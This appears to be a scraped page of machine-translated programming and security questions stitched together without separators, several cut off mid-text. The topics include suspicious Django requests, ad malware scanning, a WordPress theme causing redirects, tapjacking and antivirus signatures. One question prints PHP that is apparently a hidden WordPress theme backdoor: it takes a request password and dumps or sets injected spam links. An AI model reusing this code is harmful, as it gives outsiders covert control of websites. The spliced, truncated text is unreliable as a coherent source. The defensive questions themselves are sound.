我在 Amazon Lightsail 上托管一个简单的原型,并且在 Django 服务器上看到了一些奇怪的请求。有什么需要担心的吗?
Invalid HTTP_HOST header: 'fuwu.sogou.com'. You may need to add 'fuwu.sogou.com' to
ALLOWED_HOSTS.
Invalid HTTP_HOST header: 'fuwu.sogou.com'. You may need to add 'fuwu.sogou.com' to
ALLOWED_HOSTS.
Bad Request: /http:/fuwu.sogou.com/404/index.html
Bad Request: /http:/fuwu.sogou.com/404/index.html
[01/Aug/2021 02:50:44] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 400 63056
[01/Aug/2021 02:50:44] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 400 63066
[01/Aug/2021 02:50:51] code 400, message Bad request syntax ('\x05\x01\x00')
[01/Aug/2021 02:50:51] "" 400 -
Run Code Online (Sandbox Code Playgroud) 我们有一个应用程序可以在我们客户的(Windows OS/PC)计算机上自动安装自己的升级程序.它重量轻(650K),为我们的客户提供非常具体的任务,帮助我们为他们收集数据,作为我们为客户提供整体服务的一部分.它首先检查我们的网站,看看是否存在更新版本的应用程序并下载最新版本.我们遇到的问题越来越多是双重的:
我们可以一个接一个地帮助那些不太了解问题是什么以及如何解决问题的客户,但这非常耗时.它重新出现在我们发布的每个新版本上,用于自动下载和升级(大约每季度一次).看到我们有大约1500名客户,这很难管理.
请与我分享您实施的任何方法或如何解决此问题.
更多细节:该应用程序是VFP 8 exe.它有一个首先启动的shell应用程序,查看是否有新版本,下载新版本,然后启动它.
我们最近遇到一个问题,即通过第三方购买广告的广告客户是通过他们购买的广告分发恶意软件.
这导致谷歌黑色在短时间内列出我们的网络资产.
此问题现已解决.
发生这种情况后,我们决定自我恳求广告客户.
在网上搜索提供此服务的服务后,我们发现了一些...... Armorize(www.armorize.com)等提供此类服务.但在通过电话与他们的销售人员交谈后,我们发现他们为这项服务收取10K-15K美元/年的费用.超出我们的价格范围.
我们没有那种蛋糕.
我们所拥有的是对我们(错误,我的)肩膀的聪明头脑.
所以,这就是我开发的内容.
A) Selenium running firefox.
B) Firefox proxying all requests via a locally hosted squid proxy.
Run Code Online (Sandbox Code Playgroud)
结果?
管道广告客户网址 - > Selenium Firefox - > Squid访问日志 - >广告所点击的所有网址的干净清单.
下一步是针对某种恶意软件列表测试这些.我们现在正在测试它们googles safebrowsing API(https://developers.google.com/safe-browsing/).
结果正是我们想要的.一种通过"真实浏览器"测试我们的广告商点击的每个URL的方法.
所以,问题如下:
a)就Google而言,使用他们的(googles)API是否可接受?我们将100%保留在内部,并且不会转售此服务.它为我们100%.
b)谷歌安全浏览器API是否允许检查FULL URL,或者它是否仅适用于每个域?
c)有没有人知道我们可以测试这些URL的任何其他API?免费/低成本会很棒:)
谢谢!
美好的一天
我刚刚将一个Wordpress主题上传到我的网站网络服务器上.现在我在我的家庭服务器上测试了这个主题,没有任何问题.
由于它已经在网络服务器上(在一家值得信赖的托管公司),当我浏览我的网站时,我会将网址重定向到恶意网站.(我从来没有向任何人提供任何帐户详细信息,帐户只有一周的时间)
这是我的网站:http://evolutionof4.co.za
它链接到的恶意网站是:themeforest.net,carolini.net等.
我已经在网络服务器上扫描了我的所有文件以查找恶意软件(使用avast),我还使用Sucuri Security扫描了我的网站,但它没有接收任何内容.
我不认为它是我的PC上的恶意软件,因为我从我的局域网上的另一台PC遇到同样的问题...
有帮助吗?
谢谢
试图避免我的观点涉及从覆盖层接收反馈......
以下是某人在 Android 上进行的黑客攻击示例,允许用户无意中按下系统按钮属性,甚至输入凭据来执行与最初意图完全不同的操作:
http://www.youtube.com/watch?v=gCLU7YUXUAY
我想确认设置该属性
android:filterTouchesWhenObscured="true"
在我的 xml 视图中,这会阻碍跨设备发生这种情况,因为我打算制作一个安全的应用程序。
在哪里可以获得最新版本的 PEiD 数据库?我知道 github 上有一个版本(https://raw.githubusercontent.com/guelfoweb/peframe/5beta/peframe/signatures/userdb.txt),但它已经有一年多的历史了,大约有 4000 个签名。
假设我创建了一个文件压缩库,这个库用于1000(非恶意)程序.但现在恶意软件开发人员决定创建一个恶意软件并使用我的库来压缩一些文件.
根据我对防病毒如何工作的一点知识,它从恶意软件中选择一组字节串并将其存储在其数据库中.现在,当防病毒软件扫描具有这些字节字符串的程序时,它会警告用户这是恶意软件.
但是,如果Antivirus选择了与我的库代码的一部分相对应的字符串,那么这不意味着我的库现在被检测为恶意软件(因此1000个非恶意程序现在被检测为恶意软件)?
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> …
Run Code Online (Sandbox Code Playgroud) 有谁知道哪个应用程序正在写入文件“%TEMP%\ Encoding Time.csv”?该文件正在不断增长。搜索Internet没有产生任何有意义的结果。下面是文件中记录的示例。
0x1B959F08、37033756854966440、11792153、11792156、3、640x360
0x1B959F08、37033756855766744、11792232、11792236、4、640x360
0x1B959F08、37033756856405856、11792303、11792306、3、640x360
electro.js是一个用户界面工具包,它允许Web应用程序作为任意GUI运行。
但是,有些应用程序应该被认为是敏感的-例如,银行业的GUI应该强有力地保证它不会做任何恶作剧。
我想知道电子可执行文件(或node.js本身)是否允许在完全禁用网络的模式下进行操作-这样,作为消费者,我至少可以确信用户界面不会发送密码-现场。
这样的东西./node_modules/.bin/electron --no-networking index.js
很方便,尽管相去甚远。